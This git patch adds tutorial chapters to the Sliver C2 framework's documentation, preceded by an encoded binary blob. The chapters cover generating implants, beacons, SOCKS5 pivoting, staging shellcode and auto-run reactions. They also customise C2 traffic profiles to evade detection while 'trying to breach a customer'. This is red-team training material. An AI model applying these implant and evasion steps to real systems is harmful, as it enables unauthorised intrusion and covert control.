zOZ*zzxE4;V$dB#Th5aCms6hy6Vq{4li`hWl+i+P`@bR48%dPJ{!s@;spX0?pxhVD! zMx&S#BfN4>Uv*@E9uaU62xAzzx@cDPA7lLDtT%VWJ!V$wISJ;i>@63Q>TpJiv<4?` z3?c%>YotI5sK{gF=KE<;iA=|-{@eD3Y)$qL^^M>bdEE*P4Tl*K(*01Zf-7Upj%9_+ z51^!q*H=Gxn2mKrFApy*HW5ghfRohI^2^3cbqo@k1E1d)AYG7bv-L4s2uH7bNB1>o z1k23d;)Ke`lhi5|{JB~@R9NfNG54|pOUduiveIp9knUL_vEK)ng&F47`0xa({-95h z@(&FSJXUjgl?&sAN)fM!K;shyN+~<+mcM`_EuxKT{5(ED6v4%Om8$%r@=HJ~STKyD zO7$wrN^&_mqn^dh&}+v~rc3bl)^}e^yT&uzi{xX_{`6v_yMhWtZ_=a}kZi-|12{mc zxK?g&6k0`%OMTOOVpd44^>m`!9%SGuT{u#7CVr#!pXCPfKGkTRfjX@+hvL%1h}mqD zTYVypGS9ebpX>U;1kZXgyXJ?U-#kBMZz_RjoC#s65);e(R%1QOwqgy$0ef+Rw?e## zUF&~{6R9JEX0zWmN3P*=aI=N&fJ;n8k9&vg8AQZ8B(40*4<94;z=!P@=V4xEFpI+YG@MfE3!q}55_w^zQ$vZcflyqBZrHA z5aSEL|B2LM!Du#{_;7i7(#07{v);3=sSOo^&sCJeXm7w2|2*WZqx~K$i>sORbA{L~ zQJzpMcC4p#qd-xtL@>rGS*z2Me?r7MR*fv|6d|z{^_<9m2wFuT0BNBiX&PAuwsqDC z``s>DgNp3i@j!-pSJY->SM!~rvSGve(H9U}64E--5GSI$3-53TI4d|;3^-R^M~N9+~kTrE?Yv9!rZR;WErk(6c-J2-6||;(M9b zOZyBwi@|+COc)MIUC&?OH~8|stgNi0Z$`@<3|lW=^IxX^v_KcVDNP+j92SUc0b!W6cmGaaSsxsvaPEASc@{j#D-UYCxF@jFq-q9}a$1YN>t;=`fCMY+mncoHlD35;%MYzlR;FtXT|jadm8!U<$>^8WPeZ1%c| zz=Wp1xIEw!-GwE?D4W4SpBG*PCSO{Nv%=fJu7{Z)-u;>BKUyWS`!myTsJm=ciCi0# z)%do`Buppg;(5?!!-D!uw9mh`a00^~a#CcQRwd)S43i;%Bm*bW6}VhUdlQXo8+G1t zD9^ShACf^hoxQX#h8r*{7d(_)ehilQZ6isOCJ9#vgSF;Byz|tcbWP@^o;6q7rK7Z3 zXSeR#d|NM5ZS>%VU<_x2(IC{QpK`z@Q(-jk)O1_7En1lhYdvD~d~<0Bzvv=}FTTC= zvv%ntp|xoWy&%1kr^z=CeoYl_Gs|XPl?V4a7!ulI96u=ffw!5ix^qtKC+v75@+lW7 z8tdT!0JdgI>*hlisz9hc6J>mdKOy`#K}LQ%-2qf+r5_JB1x zXZ4RMgIS%1vhD};xe1QMqWh71XZ91Gy^AE9FeFF?G7ro zX*)|`_R*r>>nY}P(CYn@khUKC&Rg-PkOfh95pBN%+|A(NOVPJ$0K7KpF#_J^(n5zP zH$HBaisEn^pJylCXYJs!O2!X4djRnNm-<`~(16ouL<*e|iV>WOmPMsu`Mfi}tk7_t zc0wVAR^Z8|seVl*V|-)VTGZPeE&YL5EQ>4Zj;ntbF!lsqSXzrUETmY>(1$Ya>qp0r zuW+_WtzT|J`mceZ4cr!P>%<*Y6qIpYz5Ih;fQZTy2Mx4B6dL#z?;sdO2w6j5AJRz` zg4X(RZLnwGfwQ8)n=-HJ0%{se(Ai9yX!43@A>qMKS$Og_J(m@h{0)r;YUe>mi6OoC zNgh-DD3*ZLM&-5h{s){OlviFK54~1Imf!6YuyX5GP=VgqxRzo2U8B3Z6Espa z_44#>*xkKA+~)ZPTGWR<>s`ns7!&G2nB?A_iCXJ_;72<`#G0mog;+LHU0Fum=%o06 z$hVp(Y)nBNyD~=ac(V(+Vx+)O?br6#*Xun@s3c6{8#9XDS>f~2QN!sd)`n^ZB9cp?m zTSDc9&X-F$eG^J3*P*|EH2=N{=jrai!{XiHJO(Zj$>ksWs@+bxNpIFl$sb0#Dc-fU+bc2=y!QuVz3~)uoxqa7>B9{zaX(FghJI$e zF(4;DE%jL1)I>66u+2aqLXG_Vs-CF4!J;=%@R+*jWoi2`v5Sj8)`#HAeZ2b%V;8bl zcl>taM)N3jU)-qRdS1etao30O*`gEG9)lz*=Z9}IR2xRZ6yW%-9{94g8lsh+D3(c_S;-05xevnJ&vf7{GALFI> z_UlJ1JHoAa6K|%?8pU-;P3{@P`_p0kW7g}25Bg~P3YcH%{_?H)pPb1|7#h|8S|BRO zOw?XXQAcTZ3mk}pNTEUM3o>%S3nH1eHPIRLxldU)1K^ykYvW%OIWvL4k+5Ij#BjRs z{d?yGM_a5Cs6#LzJ&sa4uZbX_Q%Ssy$Ww=(JSJSR-<$=v6*+*S80W>)6cH$ zgiar>nnPK(W6$9DGi@a9D9^TUYQ!o8@7i~pG8fu z$k_^Q>Jh&+(ng*!nAYz3@+j{(1KpV~5Ec-}IHwQdF{t73LvQ$`0B71BAZR7~x!g^x z;%I0B?bRogVSlIjGUYkFk#HyuH1gO}$boY9+a*);Y_>K=y6{txPJ*U4veM)deS;ikhH zm9Bj5Mxptk;axl$Yy62dNNscQptQbHE4V9PuN*_oQKR;K4#TG$jgHQEeUYU^W*cx> zkbe6B)9N>O8Q3Enpuw^pBQS|HdA;5qy-h&u((U6xCCq0z*jXl&h%yhRUfH_bE+do` z0zIcrV_RU3=P^SG=-;2<<6(964C&%P7AFx@=%aO_*_`P>&p9CCQ9KsER38<*av0 zzSR&b7i4f(S@%KEe!cQ%Y|x#vuW!>bR`b-})bdL>(EKoC?b;OX>lOL8+a4yyU{np# zDEwY9918J`L25E;n*G59p@*%wndBAGD?`PcsK*68-`|0E&GaV>&nP3|0#YMJ&try= zq_GGVIF%3x=}2_S2ZerUI~A>(iwL>8{wR`vXAlck%zYa7dBS0UcdNu?EEGzQ; zM#zagtDbG~lX_o&pe9eM%JrsE0!Iy1HPUl=P{UDmRj$XrIx&uGr>?RqEt+=w`Emfd zQPjK)wXdQLR9(Ld41l3jvP(=+&rAfnjIYx@REQb;dGpr`3$o4(WEF&Ht?;LDRukoEn&($ymh6{9x?s3O+5oaO zZiiuZXDELCd8Ei=gu?H&GIgE!ex>WMV*_@w;IEr^S(-jdrV!(4=2Ok!p_SRDAd2`w}8kxUuVPa+`ji8e$(hiic=Gi`hSQo%kYR(gSg zAoy8%_YrXN=pf~vueCDuf9f##%%d7*+?}-OFvA-*S8IK4I}irl zk1Is!hRtZOUylp(eNngGsWa4n@1~J>A=$^WIqJN^=m0E4te00f;0s1r71kyGblxBK zE#7UtP8a9Zd)2hhKdq%&!s!?nG@kYv`W}=nruyhx$=#XRrU^ zMo|6LvWrrBSz`v(x@e%!d5{FWhFpNp-uI<8sF)0|HoVBZhSVINVaNII$KDxUDuP#J zzr3A8$=W(t!!|C%7sRgkkBz>E!J<}NFD&BXx!#<( zfK{UZoy@_jkT|kHe4?lY$BChq!wMoxQBF9w#!IeJ-9q;nwc0{dMNGl}Ln}|BfBYSi zL4SGZ=HT{HS*OsQG0;(Xuq>s~dDoI;9GDZxQLh5j$ieRLk^6w27RTneOC|xvsffz} zBC!26E58DoVHP#u@E}KJMqewV9S=!)rb6W94FJfXqu6?hu(%)1sjI}Nz@@d66qEE= zeq^nho^k+7cK*i+(jhL4h7a3z9i}oHO_06^&T^YC&gQuy znj}zO(Wv4uD-wFZk*CVq(wQIE;?|SIh;jOA$=#Ea;wFH`s%4pK(z*akY2~#YqVi!TTBi=a=?j42U?St*1a%YpQXj>6E5u z!Wy;><>dCfxfGnHQI0)eDIWZP@rxvZ4B{VIJ8;iB^CWmo{h2Z`|L>#63a0|I17YwC zjg-%o0e^kpmkRS6FN;+OdpP3Xck*Wg$-{g=Lq^wfe;zb}4gF_Nv%&+@2!kV^s-O2k z|7rT+&;gE}CD8nj@aMf}LHmmO|MSlRpJ4Y#&~Bw(jhnv! OzGNg6#mhvEg8m=VNCsK} literal 0 HcmV?d00001 diff --git a/docs/sliver-docs/public/tutorials.json b/docs/sliver-docs/public/tutorials.json new file mode 100644 index 0000000000..94e6bec869 --- /dev/null +++ b/docs/sliver-docs/public/tutorials.json @@ -0,0 +1 @@ +{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"# Advanced web traffic configuration\n\nWhen generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer known for using ruby-on-rails. By default sliver will use:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nLet’s go ahead and update the session messages and staging with something more realistic and remove all references to woff or php.\n\n```bash\n\"session_file_ext\": \".css\",\n\"stager_file_ext\": \".ico\",\n```\n\nTODO pull urls for ror, maybe from seclists ? \n\nThe next step is to restart the http listener and generate our new implant.\n\n```bash\nTODO\nasciinema export c2profile, updating extensions and paths\n```\n\nTODO\nasciinema import custom c2profile, restart job and spin new beacon\n\nIf you now look at the debug output you’ll notice we no longer have .php urls.\n\n```bash\n2023/04/25 15:27:41 httpclient.go:672: [http] segments = [oauth2 v1 authenticate auth], filename = index, ext = css\n2023/04/25 15:27:41 httpclient.go:482: [http] POST -> http://localhost/oauth2/v1/authenticate/auth/index.css?p=711x58387 (2228 bytes)\n2023/04/25 15:27:41 httpclient.go:488: [http] POST request completed\n2023/04/25 15:27:42 httpclient.go:287: Cancelling poll context\n2023/04/25 15:27:42 httpclient.go:672: [http] segments = [assets], filename = jquery, ext = js\n2023/04/25 15:27:42 httpclient.go:406: [http] GET -> http://localhost/assets/jquery.js?r=72074674\n2023/04/25 15:27:42 sliver.go:198: [recv] sysHandler 12\n2023/04/25 15:27:42 session.go:189: [http] send envelope ...\n2023/04/25 15:27:42 httpclient.go:672: [http] segments = [oauth v1 oauth2], filename = admin, ext = css\n2023/04/25 15:27:42 httpclient.go:482: [http] POST -> http://localhost/oauth/v1/oauth2/admin.css?j=56685386 (93 bytes)\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. "},{"name":"4 - HTTP Payload staging","content":""},{"name":"5 - Pivots","content":""},{"name":"6 - Scripting","content":""},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file diff --git a/docs/sliver-docs/util/tutorials.ts b/docs/sliver-docs/util/tutorials.ts new file mode 100644 index 0000000000..b467a2fd8f --- /dev/null +++ b/docs/sliver-docs/util/tutorials.ts @@ -0,0 +1,8 @@ +export type Tutorial = { + name: string; + content: string; +}; + +export type Tutorials = { + tutorials: Tutorial[]; +}; \ No newline at end of file From 7f60e133dcbac1a3d617bbf3aceefe9ec8daa891 Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Thu, 2 May 2024 18:58:09 +0200 Subject: [PATCH 2/7] update tutorial first three chapters with asciinema and fix markdown loading issue --- docs/sliver-docs/.gitignore | 1 + docs/sliver-docs/next.config.js | 1 + docs/sliver-docs/pages/_app.tsx | 11 + docs/sliver-docs/pages/_document.tsx | 1 - docs/sliver-docs/pages/tutorials/index.tsx | 4 +- .../md/3 - C2 Profiles and configuration.md | 121 ++++- .../tutorials/md/4 - HTTP Payload staging.md | 2 +- .../pages/tutorials/md/6 - Scripting.md | 241 +++++++++ .../public/asciinema/custom_c2profile.cast | 503 ++++++++++++++++++ .../asciinema/implant_custom_c2profile.cast | 444 ++++++++++++++++ .../public/asciinema/implant_debug_logs.cast | 43 ++ docs/sliver-docs/public/tutorials.json | 2 +- docs/sliver-docs/tsconfig.json | 3 +- docs/sliver-docs/util/search-context.ts | 20 + 14 files changed, 1362 insertions(+), 35 deletions(-) create mode 100644 docs/sliver-docs/public/asciinema/custom_c2profile.cast create mode 100644 docs/sliver-docs/public/asciinema/implant_custom_c2profile.cast create mode 100644 docs/sliver-docs/public/asciinema/implant_debug_logs.cast diff --git a/docs/sliver-docs/.gitignore b/docs/sliver-docs/.gitignore index 835056f003..a9896e08ad 100644 --- a/docs/sliver-docs/.gitignore +++ b/docs/sliver-docs/.gitignore @@ -3,6 +3,7 @@ # generated files public/sitemap.json public/docs.json +public/tutorials.json /www.zip # code editor files diff --git a/docs/sliver-docs/next.config.js b/docs/sliver-docs/next.config.js index 69392a38d4..b663952492 100644 --- a/docs/sliver-docs/next.config.js +++ b/docs/sliver-docs/next.config.js @@ -11,6 +11,7 @@ const nextConfig = { webpack: (config, { isServer }) => { if (isServer) { require('./prebuild/generate-docs'); + require('./prebuild/generate-tutorials'); } return config; } diff --git a/docs/sliver-docs/pages/_app.tsx b/docs/sliver-docs/pages/_app.tsx index aeaab226ff..931b7ea91d 100644 --- a/docs/sliver-docs/pages/_app.tsx +++ b/docs/sliver-docs/pages/_app.tsx @@ -1,6 +1,7 @@ import Navbar from "@/components/navbar"; import "@/styles/globals.css"; import { Docs } from "@/util/docs"; +import { Tutorials } from "@/util/tutorials"; import { SearchContext, SearchCtx } from "@/util/search-context"; import { Themes } from "@/util/themes"; import { faExternalLink } from "@fortawesome/free-solid-svg-icons"; @@ -42,6 +43,16 @@ export default function App({ Component, pageProps }: AppProps) { }, }); + queryClient.prefetchQuery({ + queryKey: ["tutorials"], + queryFn: async (): Promise => { + const res = await fetch("/tutorials.json"); + const tutorials: Tutorials = await res.json(); + search.addTutorials(tutorials); + return tutorials; + }, + }); + return ( diff --git a/docs/sliver-docs/pages/_document.tsx b/docs/sliver-docs/pages/_document.tsx index f4066f7c83..0720c9a00d 100644 --- a/docs/sliver-docs/pages/_document.tsx +++ b/docs/sliver-docs/pages/_document.tsx @@ -17,7 +17,6 @@ class MyDocument extends Document { return ( - Sliver Docs diff --git a/docs/sliver-docs/pages/tutorials/index.tsx b/docs/sliver-docs/pages/tutorials/index.tsx index 1f92072dac..27b1e4d757 100644 --- a/docs/sliver-docs/pages/tutorials/index.tsx +++ b/docs/sliver-docs/pages/tutorials/index.tsx @@ -76,7 +76,7 @@ const TutorialsIndexPage: NextPage = () => { return (

- Sliver Tutorials: {name} + Sliver Tutorial: {name}
@@ -138,7 +138,7 @@ const TutorialsIndexPage: NextPage = () => {
Welcome to the Sliver Tutorials!
- Please select a tutorial + Please select a chapter
diff --git a/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md b/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md index 2c1be1d666..4f493db812 100644 --- a/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md +++ b/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md @@ -1,12 +1,10 @@ -# Advanced web traffic configuration - When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective. C2 profile configurations can be seen using the `c2profile` command, which also allows import and export features. The full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration. -Lets imagine we’re trying to breach a customer known for using ruby-on-rails. By default sliver will use: +Lets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions: - `.woff` for staging - `.js` for poll requests @@ -14,38 +12,103 @@ Lets imagine we’re trying to breach a customer known for using ruby-on-rails. - `.png` for close session - `.php` for session messages -Let’s go ahead and update the session messages and staging with something more realistic and remove all references to woff or php. +We will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`. + +We will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way. + +We will split the urls using a script like the example below, and then update the files and paths variables in our configuration file. + +```python +import json +import math +import sys +import random + + +def updateProfile(c2ProfileName, urls, cookieName): + data = open(urls).readlines() + c2Profile = open(c2ProfileName, "r").read() + jsonC2Profile = json.loads(c2Profile) + + paths, filenames, extensions = [], [], [] + for line in data: + line = line.strip() + if "." in line: + extensions.append(line.split(".")[-1]) + + if "/" in line: + segments = line.split("/") + paths.extend(segments[:-1]) + filenames.append(segments[-1].split(".")[0]) + + extensions = list(set(extensions)) + if "" in extensions: + extensions.remove("") + random.shuffle(extensions) + + filenames = list(set(filenames)) + if "" in filenames: + filenames.remove("") + + paths = list(set(paths)) + if "" in paths: + paths.remove("") + + if len(extensions) < 5: + print(f'Got {len(extensions)} extensions, need at least 5.') + exit(0) -```bash -"session_file_ext": ".css", -"stager_file_ext": ".ico", + if len(paths) < 5: + print(f'Got {len(paths)} paths need at least 5.') + exit(0) + + if len(filenames) < 5: + print(f'Got {len(filenames)} paths need at least 5.') + exit(0) + + exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ] + for ext in exts: + jsonC2Profile["implant_config"][ext] = extensions[0] + extensions.pop(0) + + pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ] + for x, pathType in enumerate(pathTypes): + jsonC2Profile["implant_config"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))] + + fileTypes = ['poll_files','stager_files', 'session_files', 'close_files'] + for x, fileType in enumerate(fileTypes): + jsonC2Profile["implant_config"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))] + + jsonC2Profile["server_config"]["cookies"] = [cookieName] + c2Profile = open(c2ProfileName, "w") + c2Profile.write(json.dumps(jsonC2Profile)) + print("C2 Profile updated !") + + +if __name__ == "__main__": + if len(sys.argv) < 4: + print("Usage: updateProfile.py myC2Profile myurls.txt cookieName") + exit(0) + + updateProfile(sys.argv[1], sys.argv[2], sys.argv[3]) ``` +The example below demonstrates how to change and import a profile. -TODO pull urls for ror, maybe from seclists ? +```asciinema +{"src": "/asciinema/custom_c2profile.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` -The next step is to restart the http listener and generate our new implant. +At this point we can generate a new implant using our new profile. -```bash -TODO -asciinema export c2profile, updating extensions and paths +```asciinema +{"src": "/asciinema/implant_custom_c2profile.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` -TODO -asciinema import custom c2profile, restart job and spin new beacon - -If you now look at the debug output you’ll notice we no longer have .php urls. - -```bash -2023/04/25 15:27:41 httpclient.go:672: [http] segments = [oauth2 v1 authenticate auth], filename = index, ext = css -2023/04/25 15:27:41 httpclient.go:482: [http] POST -> http://localhost/oauth2/v1/authenticate/auth/index.css?p=711x58387 (2228 bytes) -2023/04/25 15:27:41 httpclient.go:488: [http] POST request completed -2023/04/25 15:27:42 httpclient.go:287: Cancelling poll context -2023/04/25 15:27:42 httpclient.go:672: [http] segments = [assets], filename = jquery, ext = js -2023/04/25 15:27:42 httpclient.go:406: [http] GET -> http://localhost/assets/jquery.js?r=72074674 -2023/04/25 15:27:42 sliver.go:198: [recv] sysHandler 12 -2023/04/25 15:27:42 session.go:189: [http] send envelope ... -2023/04/25 15:27:42 httpclient.go:672: [http] segments = [oauth v1 oauth2], filename = admin, ext = css -2023/04/25 15:27:42 httpclient.go:482: [http] POST -> http://localhost/oauth/v1/oauth2/admin.css?j=56685386 (93 bytes) +If we review the debug logs of our implant we can see that the connections now use our new profile. + +```asciinema +{"src": "/asciinema/implant_debug_logs.cast", "cols": "132", "rows": "28", "idleTimeLimit": 8} ``` -Ideally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \ No newline at end of file +Ideally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. + diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md index 3cf076e7b6..9d1abd1431 100644 --- a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -2,7 +2,7 @@ When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command. -For this exercise we will create a new profile: +For this exercise we will create a new beacon profile for linux, stage it and use a bash script to download and execute ``` [server] sliver > profiles new -b **%%LINUX_IPADDRESS%%** --format shellcode --skip-symbols --debug profile1 diff --git a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md index e69de29bb2..5cd4143233 100644 --- a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md +++ b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md @@ -0,0 +1,241 @@ +## Sliver Reactions + +Reactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events. + +```bash +Reactable Events: + session-connected Triggered when a new session is opened to a target + session-updated Triggered on changes to session metadata +session-disconnected Triggered when a session is closed (for any reason) + canary Triggered when a canary is burned or created + watchtower Triggered when implants are discovered on threat intel platforms + loot-added Triggered when a new piece of loot is added to the server + loot-removed Triggered when a piece of loot is removed from the server +``` + +Let’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in. + +```bash +reaction set -e "session-connected" + +[*] Setting reaction to: Session Opened + +? Enter commands: [Enter 2 empty lines to finish]pwd +env +? Enter commands: +pwd +env + +[*] Set reaction to session-connected (id: 1) +``` + +The reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection. + +```bash +[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST + +[*] Execute reaction: 'pwd' + +[*] /Users/tester + +[*] Execute reaction: 'env' + +PWD=/Users/tester +COLORTERM=truecolor +... +``` + +You can remove reactions using `reaction unset`. + +However, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. + +Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session. + +## Sliver-py + +For the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC. + +First, install the sliver-py extension using pip. + +```bash +pip3 install sliver-py +``` + +Since our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile + +```bash +[server] sliver > multiplayer + +[*] Multiplayer mode enabled! + +[server] sliver > new-operator -n tester -l 127.0.0.1 + +[*] Generating new client certificate, please wait ... +[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg +``` + +We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip: + +```html +pip3 install ipython3 +``` + +We first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server. + +```bash +tester@test ~/t/sliver> ipython3 +Python 3.9.16 (main, Dec 7 2022, 10:06:04) +Type 'copyright', 'credits' or 'license' for more information +IPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help. + +In [1]: from sliver import SliverClientConfig, SliverClient + +In [2]: DEFAULT_CONFIG = 